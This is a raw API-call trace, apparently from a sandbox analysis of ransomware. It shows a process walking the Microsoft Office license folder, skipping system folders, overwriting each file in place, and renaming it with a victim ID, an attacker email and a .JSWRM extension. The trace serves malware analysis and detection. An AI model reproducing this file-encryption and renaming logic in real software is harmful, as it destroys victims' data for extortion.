[0103.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f3a8 [0103.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0103.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.353] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp4-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp4-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp4-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp4-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.355] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f3a8 | out: hHeap=0x1e0000) returned 1 [0103.355] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0103.355] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0103.355] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0103.355] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.355] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe3d2e398, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe3d2e398, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe3decec0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x564e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessR_OEM_Perp4-ppd.xrm-ms", cAlternateFileName="HO13F0~1.XRM")) returned 1 [0103.355] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-ppd.xrm-ms", lpString2=".") returned 1 [0103.355] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-ppd.xrm-ms", lpString2="..") returned 1 [0103.355] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-ppd.xrm-ms", lpString2="...") returned 1 [0103.355] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-ppd.xrm-ms", lpString2="windows") returned -1 [0103.355] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-ppd.xrm-ms", lpString2="recovery") returned -1 [0103.355] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-ppd.xrm-ms", lpString2="perflogs") returned -1 [0103.355] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0103.356] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.356] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-ppd.xrm-ms", lpString2="system volume information") returned -1 [0103.356] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-ppd.xrm-ms", lpString2="msocache") returned -1 [0103.356] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0103.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp4-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0103.356] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp4-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d0a0, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_OEM_Perp4-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0103.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0103.356] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0103.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp4-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0103.356] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0103.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp4-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d260, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_OEM_Perp4-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0103.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0103.356] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0103.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0103.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.356] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0103.356] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp4-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp4-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.357] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=22094) returned 1 [0103.357] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5640) returned 0x24c1d0 [0103.357] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5640, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5640, lpOverlapped=0x0) returned 1 [0103.359] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.359] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5640, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5640, lpOverlapped=0x0) returned 1 [0103.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.360] CloseHandle (hObject=0x45c) returned 1 [0103.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0103.360] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0103.360] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0103.360] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0103.360] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0103.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bb50 [0103.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f030 [0103.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bb50 | out: hHeap=0x1e0000) returned 1 [0103.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.360] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp4-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp4-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp4-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp4-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0103.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0103.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0103.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0103.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.361] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5041085, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe5041085, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe52572ac, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d65, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessR_OEM_Perp4-ul-oob.xrm-ms", cAlternateFileName="HO7938~1.XRM")) returned 1 [0103.362] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-ul-oob.xrm-ms", lpString2=".") returned 1 [0103.362] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-ul-oob.xrm-ms", lpString2="..") returned 1 [0103.362] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-ul-oob.xrm-ms", lpString2="...") returned 1 [0103.362] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-ul-oob.xrm-ms", lpString2="windows") returned -1 [0103.362] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0103.362] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0103.362] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0103.362] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.362] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0103.362] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0103.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0103.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp4-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0103.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp4-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_OEM_Perp4-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0103.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0103.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0103.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp4-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0103.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0103.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp4-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d298, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_OEM_Perp4-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0103.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0103.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0103.362] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0103.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0103.362] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp4-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp4-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.363] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11621) returned 1 [0103.363] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0103.363] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0103.365] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.365] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0103.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.365] CloseHandle (hObject=0x45c) returned 1 [0103.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0103.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.365] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0103.365] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0103.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0103.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b380 [0103.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f158 [0103.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b380 | out: hHeap=0x1e0000) returned 1 [0103.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0103.366] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp4-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp4-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp4-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp4-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0103.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0103.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0103.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0103.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.367] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe40e7dfb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe40e7dfb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe41a69d5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4dfe, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessR_OEM_Perp4-ul-phn.xrm-ms", cAlternateFileName="HO93DC~1.XRM")) returned 1 [0103.367] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-ul-phn.xrm-ms", lpString2=".") returned 1 [0103.367] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-ul-phn.xrm-ms", lpString2="..") returned 1 [0103.367] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-ul-phn.xrm-ms", lpString2="...") returned 1 [0103.367] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-ul-phn.xrm-ms", lpString2="windows") returned -1 [0103.367] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0103.367] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-ul-phn.xrm-ms", lpString2="perflogs") returned -1 [0103.367] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0103.367] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.367] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0103.367] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-ul-phn.xrm-ms", lpString2="msocache") returned -1 [0103.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0103.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp4-ul-phn.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0103.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp4-ul-phn.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_OEM_Perp4-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0103.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0103.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0103.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp4-ul-phn.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0103.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0103.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp4-ul-phn.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_OEM_Perp4-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0103.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0103.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0103.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0103.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0103.367] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp4-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp4-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.368] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19966) returned 1 [0103.368] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4df0) returned 0x24c1d0 [0103.368] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4df0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4df0, lpOverlapped=0x0) returned 1 [0103.371] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.371] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4df0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4df0, lpOverlapped=0x0) returned 1 [0103.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 